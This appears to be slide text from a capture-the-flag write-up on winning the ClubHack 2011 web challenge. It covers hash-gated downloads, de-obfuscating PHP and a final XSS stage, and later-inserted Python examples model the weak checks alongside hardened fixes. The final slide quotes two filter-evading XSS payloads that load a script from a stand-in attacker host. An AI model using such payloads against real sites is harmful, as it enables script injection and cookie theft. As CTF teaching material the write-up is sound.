How I won ClubHack 2011 CTF

AMol NAik
http://amolnaik4.blogspot.com
Agenda
   Introduction to CTF
   ClubHack 2011 preCON CTF
   Tools
   Execution Stages
   Thanks/Questions
Introduction to CTF
   CTF stands for Capture the Flag

   Types:
       Pre-conference
       Educational
       Web based
       Exploitation
       Web + Exploitation
       Teams / Individuals
       Offensive / Defensive
ClubHack 2011 preCON CTF
   Free conference entry

   Qualified to play Treasure Hunt @ClubHack
       Physical CTF


   Web Based
Tools
   Mozilla Firefox
       Add-on: Tamper Data


   Web Server with PHP

   Brain
   Time
   Patience
   ……..
   ……..
Execution
   Register for the event
   Access CTF site
   Gather Information & Analyze
   Look for hidden treasures
   Get the Flag and Submit
Stage - 1
   Information Gathering
       Download.html
           Can be used to download files from the server
           Two params: filename & some HASH
           How important is the hash in the file download?
           What type of hash is it?
           How to generate it?


       UserLogin.html
           Auth Bypass
           Guessable Logins
           What else ???
Stage - 1
   Analysis
       Download.html
           Need hash to download file
           Hash is SHA1
           How to generate it?


       UserLogin.html
           No SQLi
           No Auth Bypass
           No Guessable Login
           Brute Force ???
Stage - 2
   Deep Inspection
       Found 'execute.php' in source of download.html
       Looks like a command utility
       OS commanding ???

   Analysis
       No OS command execution
       "Wonly one command"
       Commands which take 'file' as a parameter ???

   Single Command
       sha1sum
Stage - 3
   Something to work on
       Hash generation – execute.php
       File Download – download.php
       Login – UserLogin.php

   Try to download files
       Download.php
       Execute.php
       UserLogin.php

   Analysis
       Only 'UserLogin.php' could be downloaded
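Added example (Python, not the organisers' code): a model of the hash-gated download that Stages 1 to 3 describe. It assumes download.php compared the supplied SHA1 against the file's contents and that execute.php exposed sha1sum to any visitor; the keyed variant is this example's own suggestion for why the gate failed and how it should have been built.

```python
"""Hash-gated download: a client-computable hash is not authorization.

Constructed model of the download.php / execute.php pair the slides describe.
Assumption (not stated on the slides): download.php accepted a file when the
supplied hash equalled sha1 of that file's contents, and execute.php exposed
'sha1sum <file>' to any visitor. The hardened variant is this example's own
suggestion, not the challenge code."""
import hashlib
import hmac
import os
from typing import Optional

# Constructed in-memory web root: filename -> contents.
WEBROOT = {
    "readme.txt": b"Welcome to the preCON CTF.\n",
    "UserLogin.php": b"<?php eval(base64_decode('PLACEHOLDER'));",  # stand-in
}


def sha1sum(name: str) -> Optional[str]:
    """Models execute.php's single allowed command: a public sha1 oracle."""
    data = WEBROOT.get(name)
    return hashlib.sha1(data).hexdigest() if data is not None else None


def weak_download(name: str, supplied_hash: str) -> Optional[bytes]:
    """Assumed weak check: the 'secret' is derivable by anyone with the oracle."""
    data = WEBROOT.get(name)
    if data is None:
        return None
    if hashlib.sha1(data).hexdigest() != supplied_hash:
        return None
    return data


# Hardened variant: the download token is an HMAC over the filename under a
# secret that never leaves the server, so sha1sum output is useless as a token.
SERVER_SECRET = os.urandom(32)


def issue_token(name: str) -> str:
    """Server-side only: mint a token for a file the user is allowed to fetch."""
    return hmac.new(SERVER_SECRET, name.encode(), hashlib.sha256).hexdigest()


def hardened_download(name: str, token: str) -> Optional[bytes]:
    """Allow-list the name and check the keyed token in constant time."""
    if name not in WEBROOT:
        return None
    if not hmac.compare_digest(issue_token(name), token):
        return None
    return WEBROOT[name]
```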
Stage - 4
   Obfuscated PHP Code
       UserLogin.php is obfuscated
       "Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar"
       No online de-obfuscation tool available
           I was not able to find one


   Analysis
       Go Manual Mode !!
       Create scripts
Stage - 5
   De-Obfuscation
       Replace eval() with echo()
       base64_decode()
       Decode $variable names
       Replace $variables
       ROT13 -> base64_decode() -> gzinflate()
       Just echo
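Added example (Python, not the author's scripts and not FOPO output): the decode chain from this stage applied statically. It builds a constructed two-layer blob in the shape the slides imply (outer eval(base64_decode(...)), inner eval(gzinflate(base64_decode(str_rot13(...))))) and peels it without executing any PHP, which is what swapping eval() for echo() achieves from inside PHP.

```python
"""Peeling layered PHP obfuscation (rot13 -> base64 -> gzinflate) statically.

Constructed example: the wrapper shapes and the plaintext are made up here to
mirror the chain on the slide; the real UserLogin.php is not reproduced."""
import base64
import codecs
import re
import zlib
from typing import Optional

# Constructed plaintext standing in for the de-obfuscated UserLogin.php body.
PLAINTEXT = "$creds = file('myhashesarenothere.txt'); // constructed plaintext"


def php_gzdeflate(data: bytes) -> bytes:
    """PHP gzdeflate(): raw DEFLATE stream, no zlib or gzip header (wbits=-15)."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()


def php_gzinflate(data: bytes) -> bytes:
    """PHP gzinflate(): inverse of the above."""
    return zlib.decompress(data, wbits=-15)


def php_str_rot13(s: str) -> str:
    """PHP str_rot13(): rot13 leaves base64 digits, '+', '/', '=' untouched."""
    return codecs.encode(s, "rot13")


# The two eval() wrappers named on the slide, as regexes over PHP source.
OUTER = re.compile(r'eval\(base64_decode\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\);')
INNER = re.compile(
    r'eval\(gzinflate\(base64_decode\(str_rot13\(\s*[\'"]([^\'"]+)[\'"]\s*\)\)\)\);'
)


def peel_layer(php: str) -> Optional[str]:
    """Undo one eval() wrapper statically; None when no known wrapper is present."""
    m = INNER.search(php)
    if m:
        # Runtime order on the slide: rot13, then base64_decode, then gzinflate.
        raw = base64.b64decode(php_str_rot13(m.group(1)))
        return php_gzinflate(raw).decode()
    m = OUTER.search(php)
    if m:
        return base64.b64decode(m.group(1)).decode()
    return None


def deobfuscate(php: str, max_layers: int = 10) -> str:
    """Peel wrappers until plain code remains; the cap guards against loops."""
    for _ in range(max_layers):
        inner = peel_layer(php)
        if inner is None:
            break
        php = inner
    return php


def build_sample() -> str:
    """Constructed two-layer blob: encode in the reverse of the runtime order."""
    inner_blob = php_str_rot13(
        base64.b64encode(php_gzdeflate(PLAINTEXT.encode())).decode()
    )
    inner = f"eval(gzinflate(base64_decode(str_rot13('{inner_blob}'))));"
    outer_blob = base64.b64encode(inner.encode()).decode()
    return f"<?php eval(base64_decode('{outer_blob}'));"
```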
Stage - 5
   Analysis
       Credentials -> 'myhashesarenothere.txt'
       Successful Login -> Final.php

   Next
       Access 'myhashesarenothere.txt'
       Log in via UserLogin.php
Stage – 6: Final
   Information Gathering
       POST form
       Looks like mail client
       Hard-coded email addresses & Subject
       Message is the only available space for User Input


   Analysis
       Tamper 'TO' email address & 'Subject'
       Test 'Message' for SQLi, Code Injection, ….
       What else ???
Stage – 6: Final
   Damn…It's a ROCK !!!!
   No server-side bug
       Code Injection
       SQLi
   Only XSS
   No <script> & <img>
   May be flag.txt
   May be messages.txt || mail.txt || sec*.txt
   ?????
   ?????
Stage – 6: Final
   A Ray of Hope
       Tweet from @ClubHack



   Only “XSS”
       Never seen XSS in CTF
       What to exploit?
       Myself??
       Event Handlers
       document.cookie
       Did they mean “Some Cookie” ?
Final
   After 2-days
       Got Flag & Submit link
       Free entry to ClubHack -> Secured !!


   Payloads Used:
       <ScRiPt src="http://attacker.com/evil.js"></script>
           me
       <scr<script>ipt src="http://attacker.com/evil.js"></script>
           Vishal Oza
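Added example (Python, modelling the filter rather than the real Final.php): the slides say <script> and <img> were blocked yet both payloads above went through, which is exactly what a single-pass, case-sensitive blacklist produces. The second function is the fix: escape the Message for HTML context instead of trying to remove tags.

```python
"""Why a tag blacklist let both slide payloads through, and the fix.

The filter below is an assumption about the challenge (single-pass,
case-sensitive removal of '<script>' and '<img'); the payloads are the two
quoted on the slide. The escaping function is the hardened replacement."""
import html
import re
from typing import Callable

PAYLOAD_CASE = '<ScRiPt src="http://attacker.com/evil.js"></script>'
PAYLOAD_NESTED = '<scr<script>ipt src="http://attacker.com/evil.js"></script>'


def blacklist_filter(message: str) -> str:
    """Modelled weak filter: one pass, exact case, so it misses mixed case and
    rebuilds a tag when the blocked substring sits inside a split tag."""
    return message.replace("<script>", "").replace("<img", "")


def escape_for_html_body(message: str) -> str:
    """Hardened: encode the HTML metacharacters so no tag can form at all."""
    return html.escape(message, quote=True)


def is_script_tag_present(rendered: str) -> bool:
    """Browser-like check: tag names are case-insensitive, so match that way."""
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None


def survives(filter_fn: Callable[[str], str], payload: str) -> bool:
    """True when a script tag is still present after the given defence runs."""
    return is_script_tag_present(filter_fn(payload))
```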
Thanks/Questions
   webDEViL
       CTF Creation and Access for "Live Demo"
   ClubHack
       Organizing CTF challenge
       For Gifts !!!




                     http://twitter.com/amolnaik4
